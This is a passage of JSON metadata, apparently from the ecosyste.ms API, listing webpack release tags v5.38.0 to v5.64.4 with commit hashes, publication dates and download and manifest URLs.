tps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebp